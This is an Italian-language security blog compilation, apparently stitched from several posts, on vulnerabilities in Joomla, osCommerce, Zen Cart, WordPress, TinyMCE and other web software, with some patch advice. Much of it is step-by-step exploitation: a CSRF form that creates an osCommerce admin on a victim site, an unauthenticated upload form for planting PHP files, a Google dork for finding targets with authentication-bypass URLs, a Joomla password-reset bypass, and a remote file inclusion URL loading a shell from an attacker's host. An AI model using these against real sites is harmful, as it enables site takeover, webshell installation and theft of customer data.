Le due release vanno a fixare dei bug di sicurezza che permettevano il cambio della password di amministrazione, come illustrato nel blog ufficiale.

Queste vulnerabilità si vanno a sommare a quelle riscontrate su numerosi componenti aggiuntivi nel mese di Ottobre 2011 ed illustrate da Secunia.com. Tali bug permettono di passare input alla index.php, tramite il parametro “file”, includendo file non verificati o, tramite il parametro POST “url_options”, si possono creare file cookie con PHP arbitrario contenuto nella webroot.

Il consiglio per tutti gli utilizzatori di questo CMS in tutte le versioni possibili è solo uno: AGGIORNATE!!

Di seguito il link per effettuare il download direttamente dal sito ufficiale degli sviluppatori:

http://www.joomla.org/download.html

Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente “stabili” sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo Xss, Full Path Disclosure, Local File Inclusion e XSRF.

La Full Path Disclosure consiste nell’interrogare alcuni file del Template di OsCommerce che, andando in errore, mostrano a video la full path della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La XSS permette di iniettare codice JavaScript sfruttando una falla del file “products.php” mentre la Local File Inclusion consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.

Anche in questo caso c’è una falla più grave delle altre e a mio avviso è la XSRF che permette di inviare comandi all’applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico sarà possibile creare un nuovo Admin sull’OsCommerce.

Basterà creare una pagina “.html” contenente il seguente codice:

<html>
<body>
<form action="http://<sito vittima>/admin/index.php?administrators&action=save" method="post">
<input type="text" name="user_name" value="<nomeutente>">
<input type="text" name="user_password" value="<password>">
<input type="text" name="modules[]" value="0?>
<input type="hidden" name="subaction" value="confirm"/>
<input type="submit" value="Save">
</form>
</body>
</html>

Ovviamente dovrete sostituire i seguenti parametri:

<sito vittima> con il dominio del sito in cui si vuole creare l’account

<nomeutente> con il nome utente del nuovo Admin

<password> con la password da associare al nuovo Admin

Una volta creata la pagina richiamatela dal vostro Browser e cliccate su “Save”.

Se tutto è andato a buon fine accedendo all’url:

http://<sito vittima>/admin/

potrete loggarvi come Admin con i dati appena inseriti.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

osCommerce v3.0a5 [ Multiple Vulnerabilities ]

La versione vulnerabile è l’ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload.

La vulnerabilità Full Path Disclosure permette, se la gestione degli errori è configurata per mostrarli a video, di conoscere la path assoluta dell’applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l’informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due XSS, invece, non affliggono l’attuale 1.3.9h ma tutte le versioni precedenti. Le vulnerabilità sono localizzate nel campo “Quantità” del carrello che permette l‘injection di codice XSS e nell’Area Amministrativa “Location/Taxes”. Per quest’ultima, quindi, si presume che si abbia già l’accesso Admin.

L’ultima vulnerabilità, la più grave, riguarda invece il componente Banner (banner_manager.php) che, così come per OsCommerce, permette di effettuare l’upload di files che verranno salvati nella cartella “images”.

Per informazioni dettagliate vi rimando al link del Dr. Alberto Fontanella autore dell’articolo.

Zen Cart <= v.1.3.9h [ Multiple Vulnerabilities ]

A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: la 2.3.1 e la nuova 3.0.1. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.

Lo scorso 14 Maggio, però, è stata scoperta una nuova falla (purtoppo molto simile alla precedente) che permette l’upload di files nella cartella “/images” senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.

Come riportato qui il componente Banner (banner_manager.php) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che consente di uploadare files sul sito “vittima” semplicemente creando sul proprio PC una pagina html con il seguente codice:

<form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”><br>
<input type=”file” name=”banners_image”><br>
<input name=”submit” value=” Save ” type=”submit”></form>

Basterà sostituire a “site/path” il dominio e l’eventuale sottocartella del sito basato su questo Cms e salvare il file in formato “.html”.

Apritelo con il vostro Browser e vi troverete davanti un form di upload file.

Scegliete il vostro file e fate l’upload; una volta terminata l’operazione potrete interrogare il file richiamando l’url nel seguente modo:

http://site/path/images/<fileinviato.php>

Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di iniezione di virus/malware come già riscontrato sempre nel 2009.

Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.

Continue reading here:
Rubati 11 milioni di dollari da hacker cinesi a conti correnti online di aziende

Source: WebMasterPoint.org NEWS

Read the original:
Microsoft, patch day da record

Source: Webnews

Breve videoguida all’utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili.

Un buon tool che permette di risparmiare tempo durante i pentest!

Read the rest here:
XCode SQL Injection Scanner

Read the original here:
Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano

Original post:
「Neuromancer」Hacking sites with Joomla (Universidade USP)

Ciao a tutti, dopo diverso tempo dall’ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto Cms Joomla.

E’ stata pubblicata da poco una vulnerabilità di tipo XSS per tutte le versioni < =1.5.20, ossia tutte le versioni attualmente pubblicate.

Tale exploit sfrutta una falla nella verifica delle variabili GET encodate eseguendo quindi il codice Javascript che si passa all’applicativo.

Full Discolsure Advisories

Al seguente video si potrà vedere un Proof of Concept dell’attacco Xss.

Proof of Concept by yehg.net

Un malintenzionato potrebbe sfruttare tale falla per rubare i cookie degli utenti loggati, Administrator compreso, e sfruttarli per modificare pagine o uploadare shell malevole che permetterebbero qualsiasi operazione nello spazio del sito vittima. Una volta rubati i cookie di Admin, infatti, basterà andare nella pagina di edit di uno dei template di default, di solito ‘beez’, e successivamente editare la pagina con il codice di una shell php quali c99 o r57.

Provvedero’ ad aggiornare il post quanto prima con tutti i riferimenti e i dettagli (sono in treno con l’app WordPress per Blackberry ).

AGGIORNAMENTO #1
Lo staff di Joomla ha provveduto a rilasciare la nuova versione dove tale problema e’ stato fixato.

Chiunque utilizzi questo Cms e’ invitato ad effettuare l’upgrade alla versione 1.5.21

Joomla 1.5.21 – Official Site

Joomla Security News

Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell’utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall’italiano Luca “daath” De Fulgentis che ha illustrato nel dettaglio l‘exploit nel suo blog.

Dal sito di Offensive-Security, che andrà a sostituire il noto Milw0rm, ormai chiuso, è possibile scaricare l’exploit Php che consente di uploadare qualsiasi tipo di file semplicemente eseguend l’exploit php dalla propria shell.

Come detto in precedenza l’hack sfrutta una vulnerabilità del TinyMCE. Questo editor utilizza un array dove vengono dichiarate le estensioni dei file che non possono essere uploadate ma modificando opportunamente gli Header HTTP è possibile uploadare un file con un’estensione accettata e successivamente far effettuare il rename del file allo stesso TinyMCE.

Ovviamente vi è un sistema di “sicurezza” nello script dell’editor ma, purtroppo, si tratta di una semplice verifica di un hash MD5 generato dalla concatenazione della path assoluta con una variabile chiamata “$tinybrowser['obfuscate']” che è settata di default a “s0merand0mjunk!!!111″ nel file “config_tinybrowser.php” che trovate al seguente percorso:

http://<path_joomla>/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/config_tinybrowser.php

Questo invece il sistema di “sicurezza” (o meglio, la vulnerabilità) del file “upload_file.php” che verifica l’Hash MD5:

L’exploit creato da daath una volta indicato il “sito vittima” per prima cosa provvede a bypassare questo meccanismo effettuando un Path Disclosure. Con questa tecnica si interroga un file in modo non corretto così da far mostrare a video un tipico errore PHP che riporta la path assoluta del file in errore. Una volta ottenuta questa informazione si potrà ricreare l’Hash MD5 (path assoluta + ‘s0merand0mjunk!!!111′) tramite il quale poter lanciare una POST Http per l’upload del file. Il file, ovviamente, dovrà avere un’estensione valida come, ad esempio, “.jpg”.

Una volta effettuato l’upload si effettua una seconda interrogazione Http inviando i dati necessari a far eseguire il rename del file da “.jpg” (o qualunque estensione è stata scelta) a “.php”.

A questo punto si avrà una shell sul sito e si potra effettuare qualsiasi azione sia consentita all’utente web del sito vittima.

Come detto all’inzio dell’articolo provvedete sempre ad aggiornare alle ultime release le vostre applicazioni web!

Come potrete verificare personalmente tramite questo Proof Of Concept basterà richiamare l’url dell’Area Admin con una particolare sintassi e il gioco è fatto e si potranno visionare gli ordini, i clienti, le email.

Già verso agosto fu scoperta una grave falla nel meccanismo di autenticazione che consentiva, tramite opportune interrogazioni HTTP (http request) di eseguire comandi lato server e, sfruttando alcuni file dell’osCommerce stesso,  di uploadare file, shell etc.

Per maggiori informazioni circa questa vulnerabilità andate a questo link.

Per quanto riguarda la falla di cui vi parlo oggi vi illustro di seguito come sfruttarla e quali informazioni si possono ottenere. Per prima cosa è necessario trovare un “sito vittima“  e per fare questo ci viene incontro, ancora una volta, Google!

Cercate su Google la seguente stringa:

“Powered by OsCommerce”

(compresa di virgolette)

In questo modo il Motore di Ricerca ci mostrerà solo i siti che contengono esattamente quella frase e, quindi, con molta probabilità siti basati su OsCommerce.

A questo punto aprite qualche sito e verificate se richiamando l’area “admin” vi viene mostrata correttamente la pagina di login.

L’area admin di default è raggiungibile al seguente url:

http://<dominio_con_oscommerce>/admin

Se l’Admin non ha cambiato il nome della cartella vi apparirà una schermata simile a questa.

A questo punto si sfrutterà la vulnerabilità nell’autenticazione per bypassarla semplicemente digitando i seguenti url:

/admin/orders.php/login.php
/admin/mail.php/login.php
/admin/mail.php/login.php?fooled
/admin/mail.php/login.php?action=send_email_to_user

Cosa succede richiamando questi url? (a voi scoprirlo!)

Si accederà in visualizzazione alle funzionalità di quei file e quindi, nell’esempio citato sopra, si potranno leggere gli ordini e vedere i clienti con le relative email.

Questo articolo è solamente un Proof Of Concept e pertanto non deve portare ad alcuna azione malevola.

Per chi utilizza OsCommerce consiglio o di valutare il passaggio a tutt’altro applicativo, visto anche che il progetto è ormai fermo, oppure di andare sul Forum di OsCommerce dove suggeriscono una semplice ma efficace (?) fix al problema.

Link correlati:

OS Commerce authentication bypass by Stuart Udall

Post dal Forum di OsCommerce

La notizia non era molto dettagliata poiché la vulnerabilità era stata annunciata molto genericamente come una vulnerabilità che permetteva di “aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache”. Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e Proof of Concept.

In realtà la vulnerabilità permette di uploadare file bypassando il controllo della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. Affligge tutte le versioni inferiori alla 2.8.5 (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.

La notizia era stata pubblicata l’11 Novembre scorso nella nota Mailing List Full Disclosure dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo link. Praticamente spiega che la verifica del file uploadato avviene confrontando l’estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.

La Regular Expression, però, unita al fatto che i WebServer Apache (solamente in una particolare configurazione spiegata qui) consentono di creare file nel formato

filename.ext1.ext2

può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:

phpinfo.php.jpg

In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l’estensione “.jpg” e successivamente, verificandola con l’Array dei Mime Types ammessi, permetterebbe al file di essere uploadato scambiandolo per un’immagine.

Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:

http:///wp-content/uploads/2009//phpinfo.php.jpg

Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto che chi attaca deve essere un membro dello staff con privilegi di pubblicazione come era stato annunciato in occasione della 2.8.6.

Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.

Eccovi alcuni link correlati:

Proof Of Concepts – WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski

Vupen – WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities

SecurityFocus – WordPress Unspecified Cross Site Scripting Vulnerability

Le vulnerabilità sono di due tipi: Blind SQL Injection e Remote Code Execution.

Tale vulnerabilità è stata riportata da Milworm e questo è l’indirizzo dell’Exploit.

Egix, lo scopritore di tale vulnerabilità riporta anche un fix da applicare al file “php-stats.recjs.php” al fine di correggere tale falla di sicurezza.

Per fixare il vostro Php-Stats aprite il file “php-stats.recjs.php” e posizionatevi alla Riga 94. Troverete il seguente codice:

if(isset($_GET['ip'])) $ip=urldecode($_GET['ip']); else break;

che andrà sostituito con questo:

if(isset($_GET['ip'])) $ip=intval(urldecode($_GET['ip'])); else break;

Come sempre eccovi il file già fixato:

Fix Php-Stats 0.1.9.2

Questo l’Exploit pubblicato su Milw0rm:

Name: SMF 1.1.6 Filter Post Bypass
Author: WHK
WebSite: http://www.jccharry.com/

en{
The data in a post are not filtered properly when someone enters
statements BBCode wrong without content that a user can enter
words banned by the system of restrictions by allowing expose
SPAM content, and so on.
}

es{
Los datos en un post no son filtrados adecuadamente cuando alguien
ingresa declaraciones bbcode sin contenido probocando que un
usuario pueda ingresar palabras prohibidas por el sistema de
restricciones permitiendo exponer contenido SPAM, etc.
}

Example of a post / Ejemplo de un post:

——————————————————————
[color=red][size=20pt]Fu[url][/url]ck you admin![/size][/color]

My SPAM: [b]ht[b][/b]tp://www.jc[i][/i]charry.com/[/b] >:D
——————————————————————

Demo:

http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png

# milw0rm.com [2008-10-04]

Viene spiegato che “…i dati in un post non vengono filtrati correttamente quando vengono inseriti alcuni tag BBCode errati permettendo così di inserire parole (o tutto ciò che è ritenuto SPAM) bypassando il Filtro AntiSpam..“.

L’autore dell’exploit, tale WHK, allega poi l’immagine seguente dove riporta sia il metodo con cui ha inserito il testo ed i BBcode nel Post, sia il risultato finale.

Esempio pubblicato dall'autore

Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:

http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?

Dalle mie verifiche ho riscontrato che il file che viene ricercato nell’Url specificato è “ipblock.inc.php” e, quindi, se volete includere una shell o simili vi consiglio di chiamare il file in tale modo e inserire l’Url dell Rfi senza specificare il file.

Se, quindi, avete il file nel sito “http://www.miosito.it/shell/ipblock.inc.php” l’Url per la Remote File Inclusion sarà:

http://[Taget]/[Path]/config.inc.php?path_escape=http://www.miosito.it/shell/

A questo link potete leggere la Vulnerabilità descritta dal sito FrSIRT.

Tale Exploit è un DoS PoC (Proof Of Concept) che sfruttando la funzione “alert” del JavaScript opportunamente formattata consente di far aumentare il carico in memoria di Google Chrome in pochi secondi causando un crash dell’applicativo. Ricorda come realizzazione quei JavaScript che venivano utilizzati forse 10 anni fa per far crashare i Browser (o in certi casi il Pc) generando un loop di apertura di PopUp.

Per chi volesse testarlo sulla propria pelle ecco l’Exploit versione Html e, successivamente, compresso con WinRar (non vorrei farvi crashare i PC  ):

Exploit Google Chrome – Milw0rm 6554

Ed eccovi alcuni screenshot del TaskManager di Chrome durante le prove.

Stato del TaskManager di Chrome appena avviato

Dopo 15 secondi la situazione era questa:

Lo stato della memoria dal TaskManager di Google Chrome dopo circa 15 secondi dal caricamento dell'Exploit

Aspettando qualche minuto la memoria Ram del proprio Pc sarà satura e Google Chrome andrà in errore

Il risultato di poco più di un minuto di attività dell'Exploit

L’unica cosa che mi permetto di osservare è che durante la navigazione, se si incappa in un sito contenente tale Exploit, potrebbe capitare di non accorgersi di quanto sta accadendo poiché, mentre Mozilla FireFox segnala e blocca l’apertura del Popup, in Google Chrome appare una barra in basso che, a mio avviso, non si nota particolarmente.

Rimango fiducioso verso gli Sviluppatori Google e come detto all’apertura di questo articolo tengo a sottolineare che stiamo parlando di una versione Beta. Penso che in occasione della primea Release Stabile questo genere di errori e falle saranno risolte a vantaggio di un nuovo concetto di Browser

Al link seguente troverete l’annuncio ufficiale:

http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html

Questo, invece, quello dal Sito Italiano:

http://www.joomlaitalia.com/content/view/323/90/

Sfruttare tale vulnerabilità risulta alquanto semplice poiché bastano pochi semplici passaggi per eseguire il reset:

1) Una volta individuato il Sito in Joomla caricare questo Url:

/index.php?option=com_user&view=reset&layout=confirm

2) A questo punto apparirà un form che chiederà l’inserimento di un codice che, teoricamente, avreste dovuto ricevere in mail

3) Inserite l’apice (‘) come carattere continuate

4) A questo punto avrete il campo di cambio password e, inserendola, editerete direttamente il profilo Administrator

Il supporto Joomla individuata la vulnerabilità (la variabile token non veniva correttamente verificata) ha provveduto a rilasciare in tempi da record la versione 1.5.6 con tale problema fixato. Dalla sua uscita sono stati scoperti ulteriori vulnerabilità che han portato alla release 1.5.7 in pochi giorni:

Potete scaricare dai seguenti link questa versione:

Joomla 1.5.7 Full Eng

Joomla 1.5.7 Full Ita

Per chi avesse subito un’hacking sfruttando questa vulnerabilità consiglio di aggiornare a questa versione e, nel caso siano ancora visibili “tracce” (home page cambiate) dell’hacker ho notato, per esperienza, che le pagine maggiormente colpite sono 3:

• configuration.php
• index.php (del template attivo nel Cms)
• la cartella “cache” (consiglio di svuotarla)

Provvedete a ripristinare le originali e il problema è risolto.

Dato che trovere il vostro account Admin non accessibile visto che è stata cambiata la password sarà necessario effettuare l’accesso direttamente al PhpMyAdmin e riscrivere la password nel Database.

Una guida a questa operazione la potete trovare qui.

Per chi non avesse sbattimento ho fatto uno scriptino veloce veloce che fa la stessa cosa. Basta copiare il file nella root della vostra installazione Joomla, richiamarlo da Browser e impostare la password.

Il file lo potete scaricare dal seguente link:

Joomla Change Admin Password

Infine, x chi ha molto sbattimento, di seguito la guida a come fixare tale vulnerabilità manualmente.

1. Aprire il file “/components/com_user/models/reset.php”
2. Posizionarsi alla riga 113 dopo la riga “global $mainframe;” ed inserire il seguente codice
   

   if(strlen($token) != 32) {
   $this->setError(JText::_(‘INVALID_TOKEN’));
   return false;
   }

3. Fine dei giochi!